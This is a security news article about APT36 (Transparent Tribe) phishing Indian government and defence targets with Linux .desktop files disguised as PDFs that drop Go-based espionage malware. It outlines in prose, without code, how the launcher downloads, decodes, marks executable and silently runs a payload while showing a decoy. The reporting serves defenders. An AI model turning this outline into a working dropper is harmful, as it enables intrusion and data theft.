APT36 Hackers Abuse Linux to Deliver Malware in Espionage Attacks

APT36, also known as Transparent Tribe, has launched a new wave of cyberattacks against Indian government and defense entities by exploiting Linux .desktop files as malware droppers. According to reports from CYFIRMA and CloudSEK, the campaign began on August 1, 2025, and remains active. The threat group, believed to operate from Pakistan, is using phishing lures to trick victims into executing malicious files disguised as PDFs, enabling espionage operations and long-term data theft.

APT36 has a history of cyber-espionage in South Asia, but this campaign reflects an evolution in its tradecraft. Instead of relying solely on Windows-based lures, the group is expanding to Linux environments, taking advantage of under-monitored desktop file mechanisms to bypass detection.

How the Attack Chain Begins with Malicious ZIP Archives

The infection vector starts with phishing emails delivering ZIP files to targeted users. Inside these archives, attackers include a malicious .desktop file masquerading as a PDF document. Victims, assuming they are opening a harmless report, trigger the attack chain when they click the file.

Linux .desktop files are normally harmless text-based launchers that define application names, icons, and commands for desktop environments. However, in this campaign, APT36 modifies them to execute bash commands instead of launching genuine applications.

When executed, the file instructs the system to:

• Create a temporary filename under /tmp/.
• Download a hex-encoded payload from attacker-controlled infrastructure or Google Drive.
• Decode and save it locally.
• Use chmod +x to make the payload executable.
• Launch it silently in the background.

To reduce suspicion, the script also opens a decoy PDF hosted on Google Drive in Firefox, ensuring the victim sees expected content while the malware executes in the background.

Why Linux .Desktop Files Are an Attractive Target

Linux desktop files have not traditionally been considered a security risk. They are plain text files, not binaries, and therefore are not closely scrutinized by most endpoint security tools. APT36’s exploitation of this feature mirrors how Windows LNK shortcut files have long been weaponized by attackers to deliver payloads while appearing benign.

The abuse of .desktop files makes detection and prevention difficult. Because the files themselves are not inherently malicious, traditional antivirus solutions may fail to flag them. This provides APT36 with a stealthy way to distribute malware in environments that are increasingly adopting Linux systems in enterprise and defense networks.

Payload Analysis: Go-Based ELF Malware

The dropped payload is a Go-based ELF executable designed for espionage. Researchers note that the malware is packed and obfuscated, making static analysis challenging. Despite these hurdles, investigation revealed several key functions:

• Data Exfiltration: The malware establishes a secure channel to send sensitive files and credentials back to attacker infrastructure.
• Remote Command Execution: Operators can issue arbitrary commands on the compromised host, enabling full system control.
• Persistence Mechanisms: The malware may configure cron jobs or systemd services to ensure it remains active even after reboots.
• Stealth Mode: The binary can run in hidden mode to avoid detection by system administrators.

Communication between infected systems and the command-and-control (C2) server takes place through a bi-directional WebSocket channel. This enables low-latency interactions, such as live command execution and immediate exfiltration of stolen data.

Campaign Evolution Reflects APT36’s Growing Sophistication

While APT36 has historically focused on Windows malware, this campaign shows a strategic expansion into Linux ecosystems. The group’s ability to adapt its techniques across platforms highlights its persistence and resource investment. CYFIRMA and CloudSEK both emphasize that the tactics, techniques, and procedures (TTPs) align with past Transparent Tribe operations, including reliance on phishing lures and staged payload delivery.

However, the use of Linux .desktop files is notable for its rarity. Few advanced persistent threat (APT) groups have attempted to weaponize Linux launchers in this manner. This not only demonstrates innovation but also raises challenges for defenders, as many Linux security frameworks may not yet treat desktop files as risky attack vectors.

Broader Context of South Asian Cyber-Espionage

APT36 is one of several Pakistan-linked groups conducting cyber-espionage against Indian defense, diplomatic, and government targets. Past operations involved Windows malware families, mobile spyware, and credential phishing campaigns. This new Linux-focused approach suggests an attempt to broaden operational reach to environments where Windows dominance is lower, particularly within defense research and command networks.

The campaign also mirrors a wider industry trend: state-aligned actors are increasingly targeting Linux servers and workstations because of their widespread role in enterprise and cloud infrastructure. By adopting novel delivery mechanisms, groups like APT36 seek to ensure long-term access and reduce the chance of exposure.

A Sign of Escalating Threat to Linux Environments

This latest campaign demonstrates that Linux platforms are not immune from the same level of creative exploitation seen in Windows ecosystems. By turning an everyday feature like .desktop files into a weapon, APT36 has expanded its arsenal while lowering the chances of early detection.

Both CYFIRMA and CloudSEK warn that the campaign remains active and may evolve further. For enterprises and government organizations in the region, the findings serve as a reminder that Linux workstations, often overlooked in security strategies, are becoming high-value targets for espionage groups.

MITRE ATT&CK Mapping of APT36 Campaign